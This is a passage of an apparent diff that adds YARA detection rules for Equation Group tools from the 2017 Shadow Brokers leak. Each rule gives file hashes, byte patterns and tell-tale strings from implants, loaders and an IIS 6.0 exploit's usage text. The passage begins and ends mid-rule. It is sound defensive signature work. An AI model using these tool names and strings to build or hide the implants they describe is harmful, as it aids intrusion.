+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:27:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f9ea8ff5985b94f635d03f3aab9ad4fb4e8c2ad931137dba4f8ee8a809421b91"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "0M1U1Z1p1" fullword ascii
+      $op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 } 
+      $op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 } 
+      $op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_DllLoad_Target_RID3758 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:34:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a42d5201af655e43cefef30d7511697e6faa2469dc4a74bc10aa060b522a1cf5"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "BzWKJD+" fullword ascii
+      $op1 = { 44 24 6c 6c 88 5c 24 6d } 
+      $op2 = { 44 24 54 63 c6 44 24 55 74 c6 44 24 56 69 } 
+      $op3 = { 44 24 5c 6c c6 44 24 5d 65 c6 44 24 5e } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_EXPA_RID3324 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 14:35:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2017176d3b5731a188eca1b71c50fb938c19d6260c9ff58c7c9534e317d315f8"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "* The target is IIS 6.0 but is not running content indexing servicess," fullword ascii
+      $x2 = "--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]sL" fullword ascii
+      $x3 = "By default, the shellcode will attempt to immediately connect s$" fullword ascii
+      $x4 = "UNEXPECTED SHELLCODE CONFIGURATION ERRORs" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 12000KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_RemoteExecute_Target_RID39FB : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:27:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4a649ca8da7b5499821a768c650a397216cdc95d826862bf30fcc4725ce8587f"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Win32_Process" fullword ascii
+      $s2 = "\\\\%ls\\root\\cimv2" fullword wide
+      $op1 = { 83 7b 18 01 75 12 83 63 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_DS_ParseLogs_RID367C : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:57:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0228691d63038b072cdbf50782990d505507757efbfa87655bb2182cf6375956"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "* Size (%d) of remaining capture file is too small to contain a valid header" fullword wide
+      $x2 = "* Capture header not found at start of buffer" fullword wide
+      $x3 = "Usage: %ws <capture_file> <results_prefix>" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Oracle_Implant_RID3780 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:41:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8e9be4960c62ed7f210ce08f291e410ce0929cd3a86fe70315d7222e3df4587e"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op0 = { fe ff ff ff 48 89 9c 24 80 21 00 00 48 89 ac 24 } 
+      $op1 = { e9 34 11 00 00 b8 3e 01 00 00 e9 2a 11 00 00 b8 } 
+      $op2 = { 48 8b ca e8 bf 84 00 00 4c 8b e0 8d 34 00 44 8d } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_DmGz_Target_RID362E : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:44:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5964966041f93d5d0fb63ce4a85cf9f7a73845065e10519b0947d4a065fdbdf2"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\\\.\\%ls" fullword ascii
+      $s3 = "6\"6<6C6H6M6Z6f6t6" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_SetResourceName_RID37EB : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:59:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "537793d5158aecd0debae25416450bd885725adfc8ca53b0577a3df4b0222e2e"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Updates the name of the dll or executable in the resource file" fullword ascii
+      $x2 = "*NOTE: SetResourceName does not work with PeddleCheap versions" fullword ascii
+      $x3 = "2 = [appinit.dll] level4 dll" fullword ascii
+      $x4 = "1 = [spcss32.exe] level3 exe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_drivers_Implant_RID3829 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:09:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ee8b048f1c6ba821d92c15d614c2d937c32aeda7b7ea0943fd4f640b57b1c1ab"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".?AVFeFinallyFailure@@" fullword ascii
+      $s2 = "hZwLoadDriver" fullword ascii
+      $op1 = { b0 01 e8 58 04 00 00 c3 33 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 30KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Shares_Target_RID3722 : APT DEMO EXE FILE T1047 {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:25:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6c57fb33c5e7d2dee415ae6168c9c3e0decca41ffe023ff13056ff37609235cb"
+      tags = "APT, DEMO, EXE, FILE, T1047"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Select * from Win32_Share" fullword ascii
+      $s2 = "slocalhost" fullword wide
+      $s3 = "\\\\%ls\\root\\cimv2" fullword wide
+      $s4 = "\\\\%ls\\%ls" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_ntfltmgr_RID3564 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:11:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3df61b8ef42a995b8f15a0d38bc51f2f08f8d9a2afa1afc94c6f80671cf4a124"
+      hash2 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5"
+      hash3 = "980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "wCw3wDwAw2wNw@wEwZw2wDwEwBwZwFwFw4w2wZw5w1w4wFwZwGwOwGwGwEw5w2wFwGwDwFwOw" fullword ascii
+      $s6 = "w+w;w2w0w6w4w.w(wRw" fullword ascii
+      $op1 = { 80 f7 ff ff 49 89 84 34 18 02 00 00 41 83 a4 34 } 
+      $op2 = { ff 15 0b 34 00 00 eb 92 } 
+      $op3 = { 4d 8d b4 34 08 02 00 00 4d 85 f6 0f 84 ae } 
+      $op4 = { 8b ca 2b ce 8d 34 01 0f b7 3e 66 3b 7d f0 89 75 } 
+      $op5 = { 8a 40 01 00 c7 47 70 } 
+      $op6 = { e9 3c ff ff ff 6a ff 8d 45 f0 50 e8 27 11 00 00 } 
+      $op7 = { 8b 45 08 53 57 8b 7d 0c c7 40 34 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 4 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_DiBa_Target_BH_RID36F5 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:18:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7ae9a247b60dc31f424e8a7a3b3f1749ba792ff1f4ba67ac65336220021fce9f"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op0 = { 44 89 20 e9 40 ff ff ff 8b c2 48 8b 5c 24 60 48 } 
+      $op1 = { 45 33 c9 49 8d 7f 2c 41 ba } 
+      $op2 = { 89 44 24 34 eb 17 4c 8d 44 24 28 8b 54 24 30 48 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_PC_LP_RID3384 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 14:51:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3a505c39acd48a258f4ab7902629e5e2efa8a2120a4148511fe3256c37967296"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "* Failed to get connection information.  Aborting launcher!" fullword wide
+      $s2 = "Format: <command> <target port> [lp port]" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_RemoteCommand_Lp_RID383C : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:12:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "57b47613a3b5dd820dae59fc6dc2b76656bd578f015f367675219eb842098846"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Failure parsing command from %hs:%u: os=%u plugin=%u" fullword wide
+      $s2 = "Unable to get TCP listen port: %08x" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_renamer_RID34E0 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 15:49:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9c30331cb00ae8f417569e9eb2c645ebbb36511d2d1531bb8d06b83781dfe3ac"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "FILE_NAME_CONVERSION.LOG" fullword wide
+      $s2 = "Log file exists. You must delete it!!!" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_PC_Exploit_RID35CD : APT DEMO EXE EXPLOIT FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:28:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0"
+      tags = "APT, DEMO, EXE, EXPLOIT, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\\\.\\pipe\\pcheap_reuse" fullword wide
+      $s2 = "**** FAILED TO DUPLICATE SOCKET ****" fullword wide
+      $s3 = "**** UNABLE TO DUPLICATE SOCKET TYPE %u ****" fullword wide
+      $s4 = "YOU CAN IGNORE ANY 'ServiceEntry returned error' messages after this..." fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_PC_Level3_Gen_RID368C : APT DEMO EXE FILE GEN {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:00:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c7dd49b98f399072c2619758455e8b11c6ee4694bb46b2b423fa89f39b185a97"
+      hash2 = "f6b723ef985dfc23202870f56452581a08ecbce85daf8dc7db4491adaa4f6e8f"
+      tags = "APT, DEMO, EXE, FILE, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "S-%u-%u" fullword ascii
+      $s2 = "Copyright (C) Microsoft" fullword wide
+      $op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 } 
+      $op2 = { 44 24 4e 41 88 5c 24 4f ff } 
+      $op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_put_Implant9x_RID3734 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:28:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8fcc98d63504bbacdeba0c1e8df82f7c4182febdf9b08c578d1195b72d7e3d5f"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "3&3.3<3A3F3K3V3c3m3" fullword ascii
+      $op1 = { c9 c2 08 00 b8 72 1c 00 68 e8 c9 fb ff ff 51 56 } 
+      $op2 = { 40 1b c9 23 c8 03 c8 38 5d 14 74 05 6a 03 58 eb } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 20KB and 2 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_promiscdetect_safe_RID396A : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:02:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6070d8199061870387bb7796fb8ccccc4d6bafed6718cbc3a02a60c6dc1af847"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "running on this computer!" fullword ascii
+      $s2 = "- Promiscuous (capture all packets on the network)" fullword ascii
+      $s3 = "Active filter for the adapter:" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_PacketScan_Implant_RID3907 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:46:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9b97cac66d73a9d268a15e47f84b3968b1f7d3d6b68302775d27b99a56fbb75a"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op0 = { e9 ef fe ff ff ff b5 c0 ef ff ff 8d 85 c8 ef ff } 
+      $op1 = { c9 c2 04 00 b8 34 26 00 68 e8 40 05 00 00 51 56 } 
+      $op2 = { e9 0b ff ff ff 8b 45 10 8d 4d c0 89 58 08 c6 45 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 30KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_SetPorts_RID353A : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:04:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "722d3cf03908629bc947c4cca7ce3d6b80590a04616f9df8f05c02de2d482fb2"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "USAGE: SetPorts <input file> <output file> <version> <port1> [port2] [port3] [port4] [port5]" fullword ascii
+      $s2 = "Valid versions are:  1 = PC 1.2   2 = PC 1.2 (24 hour)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_GrDo_FileScanner_Implant_RID3B3F : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 20:21:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "8d2e43567e1360714c4271b75c21a940f6b26a789aa0fce30c6478ae4ac587e4"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "system32\\winsrv.dll" fullword wide
+      $s2 = "raw_open CreateFile error" fullword ascii
+      $s3 = "\\dllcache\\" wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_msgks_mskgu_RID36A1 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:04:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7b4986aee8f5c4dca255431902907b36408f528f6c0f7d7fa21f079fa0a42e09"
+      hash2 = "ef906b8a8ad9dca7407e0a467b32d7f7cf32814210964be2bfb5b0e6d2ca1998"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 } 
+      $op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 } 
+      $op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Ifconfig_Target_RID37E1 : APT DEMO EXE FILE T1050 {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:57:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1ebfc0ce7139db43ddacf4a9af2cb83a407d3d1221931d359ee40588cfd0d02b"
+      tags = "APT, DEMO, EXE, FILE, T1050"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\%hs" fullword wide
+      $op1 = { 0f be 37 85 f6 0f 85 4e ff ff ff 45 85 ed 74 21 } 
+      $op2 = { 4c 8d 44 24 34 48 8d 57 08 41 8d 49 07 e8 a6 4b } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_DiBa_Target_RID360C : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:39:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 } 
+      $op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 } 
+      $op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Dsz_Implant_RID365B : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:52:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fbe103fac45abe4e3638055a3cac5e7009166f626cf2d3049fb46f3b53c1057f"
+      hash2 = "ad1dddd11b664b7c3ad6108178a8dade0a6d9795358c4a7cedbe789c62016670"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%02u:%02u:%02u.%03u-%4u: " fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_GenKey_RID3439 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 15:21:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b6f100b21da4f7e3927b03b8b5f0c595703b769d5698c835972ca0c81699ff71"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "* PrivateEncrypt -> PublicDecrypt FAILED" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_wmi_Implant_RID3677 : APT DEMO EXE FILE T1047 T1057 T1084 {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:57:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "de08d6c382faaae2b4b41b448b26d82d04a8f25375c712c12013cb0fac3bc704"
+      tags = "APT, DEMO, EXE, FILE, T1047, T1057, T1084"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "SELECT ProcessId,Description,ExecutablePath FROM Win32_Process" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_clocksvc_RID354E : APT DEMO EXE FILE T1050 {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:07:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c1bcd04b41c6b574a5c9367b777efc8b95fe6cc4e526978b7e8e09214337fac1"
+      tags = "APT, DEMO, EXE, FILE, T1050"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "~debl00l.tmp" fullword ascii
+      $x2 = "\\\\.\\mailslot\\c54321" fullword ascii
+      $x3 = "\\\\.\\mailslot\\c12345" fullword ascii
+      $x4 = "nowMutex" fullword ascii
+      $s1 = "System\\CurrentControlSet\\Services\\MSExchangeIS\\ParametersPrivate" fullword ascii
+      $s2 = "000000005017C31B7C7BCF97EC86019F5026BE85FD1FB192F6F4237B78DB12E7DFFB07748BFF6432B3870681D54BEF44077487044681FB94D17ED04217145B98" ascii
+      $s3 = "00000000E2C9ADBD8F470C7320D28000353813757F58860E90207F8874D2EB49851D3D3115A210DA6475CCFC111DCC05E4910E50071975F61972DCE345E89D88" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of ( $s* ) ) )
+}
+
+rule EquationGroup_Toolset_Apr17_xxxRIDEAREA_RID359B : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 16:20:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "214b0de83b04afdd6ad05567825b69663121eda9e804daff9f2da5554ade77c6"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "USAGE: %s -i InputFile -o OutputFile [-f FunctionOrdinal] [-a FunctionArgument] [-t ThreadOption]" fullword ascii
+      $x2 = "The output payload \"%s\" has a size of %d-bytes." fullword ascii
+      $x3 = "ERROR: fwrite(%s) failed on ucPayload" fullword ascii
+      $x4 = "Load and execute implant within the existing thread" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_yak_min_install_RID3834 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
